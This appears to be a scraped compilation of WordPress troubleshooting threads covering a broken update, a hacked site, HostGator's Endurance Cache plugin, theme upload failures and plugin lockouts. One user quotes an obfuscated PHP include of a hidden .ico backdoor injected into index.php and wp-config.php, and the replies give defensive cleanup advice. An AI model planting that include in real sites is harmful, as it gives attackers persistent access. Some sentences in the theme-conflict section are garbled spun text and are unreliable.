My wordpress site was working fine , but wordpress update it to V 5.4 and after that my website is not working , not even i can access my admin dashboard.
I tried all these step to solve this
MANUAL INSTLLATION (RECOMMENDED)
Download the WP Safe Mode plugin and unzip it, you’ll now have a
wp-safe-mode folder.
Connect to your server (for example via FTP) and go to your website
folder.
Add this line to your wp-config.php file:
if( !defined('WPMU_PLUGIN_DIR') ) define( 'WPMU_PLUGIN_DIR',
dirname(__FILE__).'/wp-content/wp-safe-mode' ); //WP Safe Mode
Create the folder named wp-safe-mode inside your wp-contents folder.
Uploade the file wp-safe-mode/bootstrap/wp-safe-mode-loader.php into
the newly created wp-safe-mode folder.
Upload the entire wp-safe-mode folder to your plugins folder in
wp-content/plugins.
If your site is broken and you cannot install plugins or access the dashboard, you can modify the loader file temporarily to gain access by following these additional steps:
Open the plugin file wp-safe-mode-loader.php and change this line:
public $safe_mode_on = false;
to
public $safe_mode_on = true;
Upload the modified wp-safe-mode-loader.php file to the
wp-contents/plugins/wp-safe-mode folder.
Visit your site, deactivate plugins etc.
Undo the changes you just made to wp-safe-mode-loader.php when you
want to disable safe mode.
But nothing works for me. Can you please suggest something so i can fix my problem
Theme Conflict Troubleshoot:
To perform this, you just activate a default theme, like Twenty Nineteen. Unfortunately, because your site is showing an error, you will need to perform the troubleshoot with either your web host’s file manager (like cPanel’s Filemanager), or use FTP or sFTP (it’s like secure version of FTP.) It’s important to note that in switching themes, you won’t lose your chosen theme’s settings. To do this, you rename your active theme’s folder by adding DISABLE or OFF to the end of the folder’s name. For example, if you’re using Twenty Eighteen and the folder is ‘twentyeighteen’, you would name it ‘twentyeighteenDISABLE’ or ‘twentyeighteenOLD’ . Go back to the front of your site and refresh.
The objective is to check whether the mistake leaves. In the event that it doesn’t, it is anything but a subject issue. Try to rename the organizer back to its unique name when you’re finished investigating.
Plugin Conflict Troubleshoot
If it’s not the theme, it might be a plugin issue. In a way, troubleshooting is similar. However, it’s much easier to rename the plugin folder to ‘pluginsOFF’. Visit the site, and log-in. This will turn off all of the plugins. Please note that it won’t remove the original settings of those plugins, as they will be there when you reactivate them later on.
Once the plugins are off, go back and rename the folder back to ‘plugins’. Go to your WordPress admin area and reactivate each, one-by-one, until you get the screen that says “There has been a critical error on your website”. The plugin that you just reactivated, is the problem.
You can either disable the plugin that caused the problem or remove it or roll it back to the previous version using the rollback plugin and wait until the developer releases a new version of the plugin.
Related
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
I noticed this new wordpress version I'm running has a "Endurance Cache" option at the bottom of the "Settings > General" page.
That is caching all of the changes I'm doing on css. So whenever I update something the changes don't reflect on the browser instantaneously.
I'm wondering if that's wordpress native or if I can remove it.
I'm using wordpress 4.8.1.
My other website that has an older wordpress version doesn't have it.
It's not listed as an installed plugin. So that I don't think it is.
I'm using thesis theme.
thanks
It is a plugin installed by hostgator. They install two plugins "Endurance Browser Cache" and "Endurance Page Cache."
You can disable the Endurance Page Cache plugin by going to "Plugins" > "Must-Use" then locating the "Endurance Page Cache" plugin and clicking "disable."
The other plugin called "Endurance Browser Cache" does not have a disable button.
I hope this works for you. I do not know if hostgator will remove these plugins for you.
Here is the easiest solution I found for it:
Log into your Cpanel and click on Files.
Choose your domain/subdomain and click on the WP-Content.
Click on the "mu-plugins".
Rename the File "endurance-page-cache.php" to "endurance-page-cache.php.old"
Create a blank file there and name it "endurance-page-cache.php"
That's it, problem solved. And if you ever in the future want to activate it again, simply delete the blank file that you created and remove the word "old" from the original file name.
I found the issue. It's a plugin installed by hostgator.
Unfortunately it's not listed in the wordpress plugins area.
So I needed to request them to remove it.
To get rid of Endurance Page Cache or whatever other mu-plugin that you don't need, you can now use Mu Manager.
After activation Go to Plugins => Must Use, and deactivate the unneeded mu-plugins that you don't need. It will be like deactivating standard plugins.
Of course, you should know which mu-plugin are not needed. In the case of Endurance Page Cache, I think you never need it if you have a proper caching plugin.
If you prefer to use FTP it will be not enough to rename the mu-plugin, because it will run the same. You need to delete it or replace the extension .php with something else.
This caching plugin was installed most probably by your hosting provider. A brief and quick solution to the problem:
Instal WP File Manager Plugin:
https://en-gb.wordpress.org/plugins/wp-file-manager/
Go to the plugin settings and head over to htdocs/WP Content/mu-plugins
Find the file "endurance-page-cache.php" and either rename it for temporal deactivation or delete it altogether if you want to get
rid of this plugin.
If this was the only file in the folder mu-plugins, you may as well delete the folder mu-plugins. "MU" stands for "Must Use". Sometimes a hosting provider or a developer might install their custom code for a site project as an mu-plugin so it doesn't get uninstalled by their customer.
Uninstall WP File Manager Plugin as it's not needed anymore. Better look on how to access your site files using C-panel if provided by your hosting provider or via FTP (like Filezilla) rather than a plugin.
Get a proper caching plugin. (Give Cachify plugin a go - it is free).
I have installed Wordpress in my Godaddy hosting.Its working quite well except i cant upload a new theme. when i click Appearance > Themes and then add new nothing shows up. The only thing that shows up are the buttons featured , most popular etc but when i click them nothing happens. When i press the upload theme button nothing happens either. How do i fix this?
I have tried it switching the default theme, deactivating all plugin but nothing resolver the problem. Godaddy support says that i will get a conformatin mail after the installation process completed within 24hours. Its almost 24hours but i haven't got any conformation mail. What can i do?? Do i really need to wait for the conformation. i can visit my blog but cant upload any theme, whats going wrong??
You can add your theme directly in your Wordpress installation. For this go to public-html/wp-content/themes/ and drop your theme folder here. Remember that your theme files must not be in subfolders of the folder e.g. /themes/your-theme/theme-files-and-folders/
Had the same issue today and solved it using these steps:
Download the Theme .zip file to your machine.
In cPanel File Manager, navigate to your Themes folder. Depending on your hosting, path to Themes folder can differ a bit but essentially you are looking for public_html inside which you’ll find /wp-content/themes/.
Once you’re inside the Themes folder in cPanel File Manager, click on Upload and upload that .zip file you saved in Step 1.
Once the .zip file is uploaded, right click on the name of that file in cPanel and select Extract from the context menu.
Now you can refresh the WordPress themes page and you should be able to Activate it.
The issue was theme related. I just renamed my current theme and then the default theme was automatically activated. Then i was able to upload my zerif lite theme and its now working fine.
I have been through this issue and i have solved it!
it happens mainly when yu transfer wordpress database from another location!
Solution:
UNinstall and deactivate all themes! delete and re install! if you cant delete the theme due to modifications, decativate the theme switch to another new theme by installing from wordpress and then reverting back to old theme!
if the problem persists: Reset server!
So I went and edited a plugin called Huge IT portfolio and added an echo "1"; exit(); in it and now i can't access the admin panel (yet i can access the site) it just gives me the echo 1.
What can I do to revert the changes to it? I can't even paste the code anymore since i can't access it
If you can access the admin panel anymore you have a few options, they all involve accessing the website via FTP.
Rename the plugins folder (ex plugins_old), logging in now will cause all plugins to disable.
Rename the directory of your specific plugin, logging in now will cause this plugin to disable.
Download the file you edited in the WordPress dashboard, undo your edits and upload it again.
I'm logged in as the administrator,
my site is self-hosted (the url is www.domain.com )
I'm not the one who built the site and I cant contact him,
this is the first time that I'm trying to install a plugin so I have never checked if it exists or not before today.
the problem is in the local version and in the online version.
thanks :-)
Since your site is self-hosted, you can navigate to the folder wp-content -> plugins and add "zzzzz_" to the front of all plugins. This will disable all plugins without breaking anything. From there, see if your Plugins tab returns in the WordPress backend. If nothing happens, change the naming structure back.
After that, you'll want to download all of the files from your theme, which can be found in wp-content -> themes -> YOUR_THEME_NAME. From there, download the files, and KEEP A BACKUP. The file you'll be looking for in your theme is functions.php. Use CTRL + F (or whatever the search is in your favorite text editor) and find remove_menu_page( or add_action('admin_menu'. You'll want to look for something referencing plugins. This site has some information on how to remove the plugins tab. There should be code using some of these functions specifically set to remove the plugins menu from your admin.
Try to disable all plugins, and see if the tab return
You can do this only in this way: http://www.wpbeginner.com/plugins/how-to-deactivate-all-plugins-when-not-able-to-access-wp-admin/
Try to change theme,too.